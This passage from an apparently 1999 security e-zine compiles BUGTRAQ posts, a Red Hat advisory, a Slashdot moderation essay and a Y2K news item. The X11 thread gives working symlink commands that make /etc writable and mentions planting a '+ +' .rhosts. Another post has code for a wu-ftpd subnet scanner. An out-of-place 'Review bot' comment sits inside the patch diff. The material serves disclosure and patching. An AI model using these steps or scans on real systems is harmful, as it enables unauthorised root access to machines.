reloading the main page). Workaround: Disable JavaScript. Regards, Georgi Guninski ----------Demonstration and source---------- http://www.nat.bg/~joro/b11.html -------------------------------------------- Control window -------------------------------------------- http://www.nat.bg/~joro/b11main.html -------------------------------------------- Control Window There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.
This page tracks the URLs the user visits in another window.
Enter your URL in the 'Tracked window'. Wait until the document is loaded, then click 'Show URL'.
This exploit needs Javascript enabled.
Workaround: Disable Javascript.

Written by Georgi Guninski

@HWA

30.0 X11R6 rewt compromise exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sun, 21 Mar 1999 21:34:48 -0800
From: in.telnetd
To: BUGTRAQ@netspace.org
Subject: X11R6 NetBSD Security Problem

Hey

If this has already been brought up, you have the right to stone me to death, but I haven't seen it and I've searched, so here it is:

I was fooling around today, and decided to rm /tmp/.X11-unix and then make a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed up /etc/passwd and

ln -s /etc/passwd /tmp/.X11-unix

and then startx'd as normal user account, but X wouldn't start, it complained and said "is not a directory". So, I made a symbolic link from /root to /tmp/.X11-unix, and startx'd as a normal user, and was surprised to have write access to /root. I was able to write new files to /root but was not able to overwrite or change files, I was able to make a "+ +" .rhosts though.

I did this to /etc also, changed it from:
drwxr-xr-x
To:
drwxrwxrwt
with:
telnetd ~$ ln -s /etc /tmp/.X11-unix
telnetd ~$ startx

I have tested this via a remote telnet session also, it works if you are able to startx and X isn't already running, I swung my chair around and got on my gateway, telneted to stinky, logged in as a normal user, ln -s /etc /tmp/.X11-unix, startx'd remotely, saw the X startup crap, looked behind me and saw X starting on stinky, I turned to my gateway and stopped X, and had write access to /etc. wh00t@$#!$

The only real thing I can think of for this to be useful is .rhosts in /root...

later
telnetd@doemill.shocking.com

-----------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 21:41:40 -0800
From: in.telnetd To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem oops, i forgot to say, this was on NetBSD 1.3.3, fresh install if you could apend this to my last message, it would be apreciated aleph1 ----------------------------------------------------------------------------- Date: Thu, 25 Mar 1999 17:20:26 -0800 From: /usr/libexec/telnetd To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem Well, when theres a reboot, /tmp/ is cleared. And If you havent started X yet, it could be a problem. This isnt and ultra spiffy important problem, just thought I would bring it up. > drwxrwxrwt 2 root root 1024 Mar 25 10:52 .X11-unix/ > > I'd like to see a non-root user delete that from /tmp. Many systems have this > in place like this, since root is the first to log into X. Systems that do not > have this directory owned by root should chown it. > > Taral > ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 23:41:02 +0200 From: Petras Sinkevicius To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem On Sun, 21 Mar 1999, in.telnetd wrote: > oops, i forgot to say, this was on NetBSD 1.3.3, fresh install > if you could apend this to my last message, it would be apreciated aleph1 > This also works under Linux, X11 v3.3.3, links to directories and files ---- bebras@petras:/tmp> ln -s /etc/group /tmp/.X11-unix bebras@petras:/tmp> ls -l /etc/group -rw-r--r-- 1 root root 336 Mar 6 13:56 /etc/group bebras@petras:/tmp> startx _X11TransSocketUNIXConnect: Can't connect: errno = 111 giving up. xinit: Connection refused (errno 111): unable to connect to X server xinit: No such process (errno 3): Server error. bebras@petras:/tmp> ls -l /etc/group -rwxrwxrwt 1 root root 336 Mar 6 13:56 /etc/group* ---- -- Drakosha Petras Sinkevicius petras@bebras.dammit.lt ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 21:21:20 +0100 
From: Matthieu Herrb To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem in.telnetd wrote (in a message from Sunday 21) > > telnetd ~$ ln -s /etc /tmp/.X11-unix > telnetd ~$ startx The following patch should fix this: Index: xc/lib/xtrans/Xtransint.h =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtransint.h,v retrieving revision diff -u -r1.1.1.2 Xtransint.h --- xc/lib/xtrans/Xtransint.h 1998/11/28 08:26:08 +++ xc/lib/xtrans/Xtransint.h 1999/03/26 08:20:27 @@ -455,6 +455,12 @@ #endif ); +static int trans_mkdir ( +#if NeedFunctionPrototypes + char *, /* path */ + int /* mode */ +#endif +); /* * Some XTRANSDEBUG stuff Index: xc/lib/xtrans/Xtranslcl.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtranslcl.c,v retrieving revision diff -u -r1.1.1.4 Xtranslcl.c --- xc/lib/xtrans/Xtranslcl.c 1999/01/08 17:31:44 +++ xc/lib/xtrans/Xtranslcl.c 1999/03/26 08:20:32 @@ -444,9 +444,11 @@ #else mode = 0777; #endif - - mkdir(X_STREAMS_DIR, mode); - chmod(X_STREAMS_DIR, mode); + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "PTSOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } if( (fd=open(server_path, O_RDWR)) >= 0 ) { #if 0 @@ -724,9 +726,11 @@ #else mode = 0777; #endif - - mkdir(X_STREAMS_DIR, mode); - chmod(X_STREAMS_DIR, mode); + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "NAMEDOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } if(stat(server_path, &sbuf) != 0) { if (errno == ENOENT) { 
@@ -1044,10 +1048,18 @@ mode = 0777; #endif - mkdir(X_STREAMS_DIR, mode); /* "/dev/X" */ - chmod(X_STREAMS_DIR, mode); - mkdir(X_ISC_DIR, mode); /* "/dev/X/ISCCONN" */ - chmod(X_ISC_DIR, mode); + /* "/dev/X" */ + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } + /* "/dev/X/ISCCONN" */ + if (trans_mkdir(X_ISC_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_ISC_DIR, errno, 0); + return(-1); + } unlink(server_path); @@ -1072,8 +1084,11 @@ */ #define X_UNIX_DIR "/tmp/.X11-unix" - mkdir(X_UNIX_DIR, mode); - chmod(X_UNIX_DIR, mode); + if (trans_mkdir(X_UNIX_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_UNIX_DIR, errno, 0); + return(-1); + } unlink(server_unix_path); Index: xc/lib/xtrans/Xtranssock.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtranssock.c,v retrieving revision diff -u -r1.1.1.4 Xtranssock.c --- xc/lib/xtrans/Xtranssock.c 1999/01/08 17:31:46 +++ xc/lib/xtrans/Xtranssock.c 1999/03/26 08:20:38 @@ -946,8 +946,11 @@ #else mode = 0777; #endif - mkdir (UNIX_DIR, mode); - chmod (UNIX_DIR, mode); + if (trans_mkdir(UNIX_DIR, mode) == -1) { + PRMSG (1, "SocketUNIXCreateListener: mkdir(%s) failed, errno = %d\n", + UNIX_DIR, errno, 0); + return TRANS_CREATE_LISTENER_FAILED; + } #endif sockname.sun_family = AF_UNIX; 
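Review bot: in the SocketUNIXCreateListener hunk (the other call sites follow the same pattern), the PRMSG text "mkdir(%s) failed, errno = %d" is misleading for the very case this patch is meant to catch. trans_mkdir() also returns -1 when the path already exists as something other than a directory with exactly the requested mode, and errno at that point is just the EEXIST left over from mkdir(), so an unexpected object sitting at UNIX_DIR is logged as an ordinary mkdir failure. Have trans_mkdir() report why it refused (exists but is not a directory, or has the wrong mode) so the log line tells an administrator that the path needs inspecting. With mode = 0777 from the #else branch shown here, a pre-existing directory that has the sticky bit set also fails the equality test and the listener is never created, where the removed chmod() used to reset the mode; decide whether that refusal is intended and say so in the message.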
@@ -1041,8 +1044,11 @@ #else mode = 0777; #endif - mkdir (UNIX_DIR, mode); - chmod (UNIX_DIR, mode); + if (trans_mkdir(UNIX_DIR, mode) == -1) { + PRMSG (1, "SocketUNIXResetListener: mkdir(%s) failed, errno = %d\n", + UNIX_DIR, errno, 0); + return TRANS_RESET_FAILURE; + } #endif close (ciptr->fd); Index: xc/lib/xtrans/Xtransutil.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtransutil.c,v retrieving revision diff -u -r1.1.1.1 Xtransutil.c --- xc/lib/xtrans/Xtransutil.c 1997/09/05 09:02:43 +++ xc/lib/xtrans/Xtransutil.c 1999/03/26 08:20:40 @@ -465,3 +465,32 @@ return (1); } + +#include +#include +#include + +static int +trans_mkdir(char *path, int mode) +{ + struct stat buf; + + if (mkdir(path, mode) == 0) { + /* I don't know why this is done, but it was in the original + xtrans code */ + chmod(path, mode); + return 0; + } + /* If mkdir failed with EEXIST, test if it is a directory with + the right modes, else fail */ + if (errno == EEXIST) { + if (stat(path, &buf) != 0) { + return -1; + } + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) { + return 0; + } + } + /* In all other cases, fail */ + return -1; +} -- Matthieu ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 13:55:13 +0100 
From: Pavel Machek To: BUGTRAQ@netspace.org Subject: not only NetBSD [was Re: X11R6 NetBSD Security Problem] Hi! > If this has already been brought up, you have the right to stone me to > death, But I havent seen it and ive searched, so here it is: > > I was fooling around today, and decided to rm /tmp/.X11-unix and then make > a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed > up /etc/passwd and > ln -s /etc/passwd /tmp/.X11-unix > and then startx'd as normal user acount, But X wouldnt start, it > complained and said "is not a directory" So, I made a symbolic link from > /root to /tmp/.X11-unix, and startx'd as a normal user, and was suprised > to have write access to /root. I tried to reproduce on 2.2.4 linux using XFree86 Version 3.3.2 / X Window System (protocol Version 11, revision 0, vendor release 6300) Release Date: March 2 1998 If the server is older than 6-12 months, or if your card is newer than the above date, look for a newer version before reporting problems. (see http://www.XFree86.Org/FAQ) . I'm not able to get write access to /etc, still I'm able to create file srwxrwxrwx 1 root root 0 Mar 26 13:48 X0= in previously unwritable directory. Bug, it seems. [There was some talk about /tmp/.X11-unix directories, and I think that this problem might very well get _worse_ with new 3.3.3 release. Please check.] Pavel -- I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-). ----------------------------------------------------------------------------- Date: Sun, 28 Mar 1999 19:01:41 -0800 
From: Kevin Vajk To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem This patch looks pretty good. (Much better than the current situatiuon!!!) A few comments: On Fri, 26 Mar 1999, Matthieu Herrb wrote: > + if (errno == EEXIST) { > + if (stat(path, &buf) != 0) { This should be lstat(). > + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) { > + return 0; > + } > + } I think you'll want to check the owner of the directory, too. - Kevin Vajk ----------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 11:12:52 -0600 From: Patrick J. Volkerding To: BUGTRAQ@netspace.org Subject: XFree86 security problem On Mon, 29 Mar 1999, Domas Mituzas wrote: > why is RedHat delaying release of this package > as it smells like root takeover (it was too easy > to change /etc/ and /etc/passwd permissions to > something neat). > > [...] > > This is cross-platform bug, as I found it in > all OS that run XFree86 3.3.3 server. As far as > I know it is on every Linux distribution (especially > newest ones) and BSD's. Before flying off the handle at Red Hat, you might consider that quite possibly they aren't vulnerable to this problem. As far as I can tell, if the system ships with a /tmp/.X11-unix/ directory already in place, and none of the system scripts delete it, then there's no security problem since nobody can put a rogue symlink at that location in /tmp. I know Slackware Linux isn't vulnerable to this problem, and never was, and I don't think we're the only ones to ship a Linux OS that provides a pre-existing /tmp/.X11-unix/. -- Patrick J. Volkerding Slackware Linux Project @HWA 31.0 Yet another wu-ftpd scanner by 03m0s1s ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 24 Mar 1999 06:29:20 PST 
From: baku@EXCITE.COM
To: BUGTRAQ@netspace.org
Subject: WUftp scanner

Hi, aleph1
this is a quick and dirty scanner I wrote to look for vulnerable wu-ftpd servers.

<---------wscan.c------>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define FTPPORT 21
#define VERBOSE 1

int main (int argc, char **argv)
{
  struct hostent *hp;
  struct in_addr addr;
  struct sockaddr_in s;
  char buf[280];                /* banner buffer (was "u_char *buf[280]") */
  int p;

  if (argc == 1)
    {
      printf ("WUftpd Buffer overflow scanner.\n");
      printf ("Written by 03m0s1s 3/19/1999\n");
      printf ("Usage: %s \n", argv[0]);
      exit (1);
    }
  hp = gethostbyname (argv[1]);
  if (!hp)
    exit (1);
  bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
  memset (&s, 0, sizeof (s));
  memset (buf, 0, sizeof (buf));        /* read() does not NUL-terminate */
  p = socket (s.sin_family = AF_INET, SOCK_STREAM, IPPROTO_TCP);
  s.sin_port = htons (FTPPORT);
  s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
  if (connect (p, (struct sockaddr *) &s, sizeof (s)) < 0)
    exit (1);
  alarm (4);                    /* Time out after 4 seconds */
  read (p, buf, 255);           /* Grab the banner */
  if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))
    {
      if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
        printf ("%s is patched.\n", inet_ntoa (addr));
      else
        printf ("%s is vulnerable.\n", inet_ntoa (addr));
      /* It must be the "Mon Aug 3 19:17:20 EDT 1998) ready." banner. */
    }
  else
    printf ("%s does not look BETA-18.\n", inet_ntoa (addr));
  if (VERBOSE)
    printf ("%s\n\n", buf);
  write (p, "bye\n", 4);        /* We just want the banner no need to stick around. */
  return 0;
}
<------end wuscan.c---------->

<-------wuss perl script----->
#!/usr/bin/perl -w
#Automate class C subnet scan, it doesn't check to see if the host is up
#could add a ping routine in here.
#Syntax ./wuss [aaa.bbb.ccc]
$net = $ARGV[0];
$START=1;
$END=254;
while ($START < $END) {
  $HOST ="$net.$START";
  print `./wuscan $HOST`;
  $START = $START + 1;
}
<------wuss--------->

-----------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:25:39 -0500
From: Gregory A Lundberg
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))

No. Way too strict. You'll miss people who touched ftpcmd.y and recompiled:

  Version wu-2.4.2-academ[BETA-18](2)

And you'll miss earlier versions which are vulnerable, say:

  Version wu-2.4.2-academ[BETA-12]

And you'll miss derivatives which are vulnerable, like one of mine:

  Version wu-2.4.2-academ[BETA-18-VR6]

> {
> if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
> printf ("%s is patched.\n", inet_ntoa (addr));

No. That's the date and time _you_ compiled the daemon. The target machine was probably compiled some other time.

--
Gregory A Lundberg          Senior Partner, VRnet Company
1441 Elmdale Drive          lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA    1-800-809-2195

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 10:05:54 -0700
From: Scott Stone
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> Hi, aleph1
> this is a quick and dirty scanner I wrote to look for vulnerable wu-ftpd
> servers.

Sorry, but this is kind of dumb. This will check to make sure that you're using a specific build of wu-ftpd... but what if you rebuilt it yourself? Then the timestamp will be different. The timestamp reflects the time/date/zone in which this particular server binary was COMPILED. So basically all this program tells me is if I'm using Redhat's prebuilt wu-ftpd binary, right? My TurboLinux wu-ftpd RPM is correctly patched, but it will say that it's 19:19:11 PST 1999 since that's when I built it, and I built it in California.

@HWA

32.0 RedHat linux security advisories
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

Security vulnerabilities have been identified in various packages that ship with Red Hat Linux. Red Hat would like to thank the members of the BUGTRAQ mailing list, the members of the Linux Security Audit team, and others. All users of Red Hat Linux are encouraged to upgrade to the new packages immediately. As always, these packages have been signed with the Red Hat PGP key.

mutt, pine:
-----------
A problem in the mime handling code could allow a remote user to execute certain commands on a local system.

Red Hat Linux 5.2
-----------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/5.2/alpha/mutt-0.95.4us-0.alpha.rpm
  rpm -Uvh ftp://updates.redhat.com/5.2/alpha/pine-4.10-1.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/5.2/i386/mutt-0.95.4us-0.i386.rpm
  rpm -Uvh ftp://updates.redhat.com/5.2/i386/pine-4.10-1.i386.rpm
sparc:
  rpm -Uvh ftp://updates.redhat.com/5.2/sparc/mutt-0.95.4us-0.sparc.rpm
  rpm -Uvh ftp://updates.redhat.com/5.2/sparc/pine-4.10-1.sparc.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/mutt-0.95.4us-0.src.rpm
  rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/pine-4.10-1.src.rpm

Red Hat Linux 5.1
-----------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/5.1/alpha/mutt-0.95.4us-0.alpha.rpm
  rpm -Uvh ftp://updates.redhat.com/5.1/alpha/pine-3.96-8.1.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/5.1/i386/mutt-0.95.4us-0.i386.rpm
  rpm -Uvh ftp://updates.redhat.com/5.1/i386/pine-3.96-8.1.i386.rpm
sparc:
  rpm -Uvh ftp://updates.redhat.com/5.1/sparc/mutt-0.95.4us-0.sparc.rpm
  rpm -Uvh ftp://updates.redhat.com/5.1/sparc/pine-3.96-8.1.sparc.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/mutt-0.95.4us-0.src.rpm
  rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/pine-3.96-8.1.src.rpm

Red Hat Linux 5.0
-----------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/5.0/alpha/mutt-0.95.4us-0.alpha.rpm
  rpm -Uvh ftp://updates.redhat.com/5.0/alpha/pine-3.96-7.1.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/5.0/i386/mutt-0.95.4us-0.i386.rpm
  rpm -Uvh ftp://updates.redhat.com/5.0/i386/pine-3.96-7.1.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/mutt-0.95.4us-0.src.rpm
  rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/pine-3.96-7.1.src.rpm

Red Hat Linux 4.2
-----------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/4.2/alpha/pine-3.96-7.0.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/4.2/i386/pine-3.96-7.0.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/4.2/sparc/pine-3.96-7.0.sparc.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/pine-3.96-7.0.src.rpm

(Mutt was not shipped with Red Hat Linux 4.2)

sysklogd
--------
An overflow in the parsing code could lead to crashes of the system logger.

Red Hat Linux 5.0,5.1,5.2:
--------------------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-0.5.i386.rpm
sparc:
  rpm -Uvh ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm

Red Hat Linux 4.2:
------------------
alpha:
  rpm -Uvh ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.0.alpha.rpm
i386:
  rpm -Uvh ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.0.i386.rpm
sparc:
  rpm -Uvh ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.0.sparc.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.0.src.rpm

zgv
---
Local users could gain root access.

Red Hat Linux 5.2:
------------------
i386:
  rpm -Uvh ftp://updates.redhat.com/5.2/i386/zgv-3.0-7.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/zgv-3.0-7.src.rpm

Red Hat Linux 5.1:
------------------
i386:
  rpm -Uvh ftp://updates.redhat.com/5.1/i386/zgv-3.0-5.1.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/zgv-3.0-5.1.src.rpm

Red Hat Linux 5.0:
------------------
i386:
  rpm -Uvh ftp://updates.redhat.com/5.0/i386/zgv-3.0-1.5.0.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/zgv-3.0-1.5.0.src.rpm

Red Hat Linux 4.2:
------------------
i386:
  rpm -Uvh ftp://updates.redhat.com/4.2/i386/zgv-3.0-1.4.2.i386.rpm
source:
  rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/zgv-3.0-1.4.2.src.rpm

Cristian
--
----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly.
It's just selective about who its friends are. @HWA 33.0 The Suburbanization of Slashdot an internet institution by Pasty Drone.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Suburbanization of Slashdot by Pasty Drone email
So I surfed into Slashdot last week, expecting the usual motley group of posters, flamers and idiots that I have come to love watching interact in the great theater that is Threads. But as I looked around, I became aware that gone were the weeds of the Meepts!, the empty, unpainted houses of the Firsts!, and the nefarious crackdens of the flamers...all around me was a chilling non-organic robot-like civility coming from posts that said things like "I like Jon" and "Slashdot is great". The posts were smooth and straight and as boring as a well-kept lawn. The unpleasant, the idiotic, the taboo had vanished from my screen. Slashdot had moved to the suburbs.

And why should I, the CEO of NewsTrolls, care what happens on Slashdot? It's Rob's site; he can do with it what he wants. And yet...and yet...

I suppose to understand my feelings about Slashdot I have to explain NewsTrolls' relationship with them. When we started NewsTrolls in September of 1998, we were already well-established as daily readers of Slashdot. Even before our beginning as our own site, I would regularly link to Slashdot articles in the daily trolling I did in HotWired's old Media Rant Threads. When NewsTrolls, after collective debate via posts, decided to have advertising on the site, we at first only ran with Slashdot's banner as a tribute to their work. At that time Slashdot was also running our NewsTrolls banner.

Another similarity we share is that when NewsTrolls started out Jon Katz contributed articles to us, but after a while he moved over to publish on Slashdot. I can't really fault him for moving...as a writer whose persona is dependent on the number of Netizens who read and like him, it made business sense to go where the numbers were bigger. And Slashdot is definitely a much larger site than NewsTrolls.

Running a site dedicated to free speech with a Threads board that can be vociferous on a good day and downright cruel on a bad one (myself included) is a giant pain in the ass.
I understand exactly (albeit on a smaller scale) what Rob's frustrations are. How do you keep the quality up and the spam down? In Slashdot's case, Rob has decided to appoint moderators to rank posts and then let users customize their viewing options so to allow them to choose which posts to view. Sounds reasonable, but there are two major problems.

1. The default is set at 0 for new users or users not logged in. Therefore, no posts that have been ranked below 0 are seen. While the option is there for the readers to change to view all posts, anyone who has been on the Internet more than 5 years knows we are constantly dealing with newbies who are lucky to navigate a page, let alone feel secure enough to change options. New users who are not computer-savvy stick with defaults.

2. The moderators who number over 400 were chosen by a smaller group of under 30 who found their posts to be useful and informative. These 400+ now rank the rest of the posts. The hope is that the moderators will spend more time grading up and only grading down the non-useful posts. Unfortunately, posters who express dissenting opinions in non-traditional manners are being downgraded, too.

When the moderation article first came out, I started a thread to discuss the ramifications of moderating threads. Regulars of NewsTrolls and readers from /. have been debating the issue with many excellent points.

Now here's my half-rant/half-loveletter on Slashdot...

To me, what I have loved about Slashdot is that it has epitomized the bizarre bazaar of open source. Scriptkiddies, geeks, phreaks, hackers, crackers, wannabes, sysadmins, developers, suits, all hollering at the story presented, at each other, at the world in general sometimes. Maybe what others call noise, I call music. I loved to see how a post on KDE could elicit useful links, suggestions, inside scoops, clueless questions, and loud dissenters from the GNOME crowd.
Or how posters would take sides on Perens or Raymond with the bloodthirst of gamblers at a cockfight. Or the hushed awe, meaningful whispers, and conspiracy theories that flew whenever Transmeta was mentioned. Or the joyful solidarity as a new Linux kernel was posted. To me, the organic twists and turns a thread would take were just as enlightening as the articles to which they were attached. The grammar flames were like a call-and-response between posters who had obviously gone through the same motions before. The glorious meept! nonsense posts were like throwing in moments straight out of Theater of the Absurd. The First Posts! were crows of delight that said: "I'm here!, You can see me!". The whole cacophonous din was like walking down Times Square in rush hour when Hansen is in the 2nd Floor MTV studios. It was ALIVE! It had SOUL!

Moderation changes all of that. It cleans up Times Square faster than Disney with a fistful of Giuliani tax incentives. It moves Slashdot to the suburbs. Now posts are judged worthy or not-worthy. Instead of simply ignoring idiots, they are now branded with a negative sign. And worst of all, dissenting opinions, some with good points, are being downgraded as well. If you experiment with the moderation on 2 or 3, you get all these earnest well-written posts that remind me of church ladies' conversation at a quilting bee. Ugh! And if you view the posts by ranked order, the organic flow is cut to bits... no longer can you see how one point flows into another and how you got from A to Z.

Is this progress? Is this what web discussion is about? No matter how much advertisers wish it so, you cannot pin down a posting community. You can't expect them to all know English in the first place and you certainly can't expect them to be of the same mind when they are of every age and experience level in the book. Why then try to moderate them? Why are so many people congratulating Slashdot on cutting down on "the noise"?
Why is it judged "noise" at all? I don't see it as noise...I may skim it instead of reading it, but I can't tell you how many times a well-placed, off-topic post has made my day. I don't want to read only the standard opinion on any topic and IMO that is the big pitfall with moderation. I want ALL the sights and smells of the bazaar, Times Square, the big city...from garbage to haute cuisine...not merely the blandness of a made-to-order, frozen-dinner, must-see-TV suburb.

Why? Because in my case, it is the posters who have nailed my mistakes, cursed me a blue streak, and even made me cry from whom I have learned the most. They have forced me to re-evaluate my opinions and restate my thoughts. They have taught me and by their hard words helped me to grow. And, they have become friends.

So what should Slashdot do instead? A few ideas:

1. Set the default to all-posts-viewed. If I'm not logged in or am new, let me see Slashdot in all its raging glory and then let me decide if I want to choose moderation.

2. I can't prove this might help with the "noise", but I think having a Threads area as opposed to posts being on the same page as the article might naturally eliminate some problems. That way, people who really felt inspired to say something would click on a link at the end of the article to a thread discussing the issue at hand. There wouldn't be the vanity of being "seen" so much, which leads to First Posts! and the like.

3. If you must moderate, have a time limit on moderation, random selection of moderators, and a constant turnover on who is moderating among your registered users. This will eliminate some of the cronyism that has already occurred due to the 400+ being selected by the original group.

4. Learn to love the flames. Certainly don't worry about Katz flames-- we gave him total hell on HotWired. It's a tradition. Flames are instructional, even if you don't like what they're teaching you.

5.
Many posters seem to flame when there are articles that they don't feel are hard-core Slashdot. So how about a separate page for those articles? The front page would be all the "News for Nerds" and you could have a link to something like "The Rest of the World" which would be the same setup but with different articles (and a place for Katz).

When it's all said and done, if Rob wants to morph Slashdot threads into a university-like moderated discussion, it's his call. Either way, I'll still be reading Slashdot. But to me, what makes Slashdot great is its many passionate voices, not a few well-written posts. Who needs the suburbs?...Give me that funk!

@HWA

34.0 Canada rolls into the fiscal new millennium with a steady eye on its govt mainframes....
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canada Rolls into Fiscal 2000
by Matt Friedman
9:30 a.m. 1.Apr.99.PST

MONTREAL -- Civil servants here were watching their computer monitors closely Thursday.

Canada's federal government began its fiscal year today, marking the first time such a year will include dates in the year 2000. If Ottawa is going to be bitten by the millennium bug, this is when the problems might start showing up. The government says it's ready.

"April 1 is hardly a surprise for us," said Paul Walsh, a spokesman for the federal Department of Public Works and Government Services. "We have been doing compliance testing for the beginning of the fiscal year and for all of the other key days leading up to and after January 1, 2000."

Those trouble dates include New Year's Day itself, the start of the new fiscal year, and 9 September 1999 (the ninth day of the ninth month of 1999). Ottawa has also tested for 7 April 1999 -- the 99th day of 1999 -- and for 29 February and 1 March 2000. The first year of the 21st century is a leap year, while the first year of the 20th century was not.

In any case, Canada will survive.
If Y2K problems do arise, they will surface in financial reporting and management systems. Department and program managers may not have correct budget information, or may not be able to allocate funds. Walsh says that won't happen. "We have tested all government-wide, mission-critical systems," Walsh said. "We ran the systems on mainframes, simulating different dates. And we tested all of the key dates, so we know that 1 April or any other date isn't an issue. Any problems would already have shown up in testing." Joe Boivin, president of the Ottawa-based Global Millennium Foundation, has been critical of the Canadian government's Y2K efforts. However, he says that, for the most part, Ottawa has its house in order. "The truth is, that anyone can see if there's going to be a problem by advancing dates in a spreadsheet," Boivin said. "It's not a difficult testing issue, and Ottawa has been testing." "The truth is that the government is one of the world leaders on this." The federal body that has been auditing the compliance process agrees. Though it is cautiously optimistic, the Office of the Auditor General (OAG) warns that there could still be problems. "No one would claim that everything is all right at this point," said Nancy Cheng, a principal with the OAG's Audit Operations Branch. "The government is hoping to have everything done by June. It has taken the issue seriously, and there has been tremendous progress, but there will be glitches. It's just not clear whether they'll be visible to the public." However, for all the planning and testing, Boivin remains skeptical that the Canadian government has covered all the bases. Some things are just going to fall through the cracks, he said. "The government report has high completion numbers, but they still haven't implemented compliance in a production environment," Boivin said. 
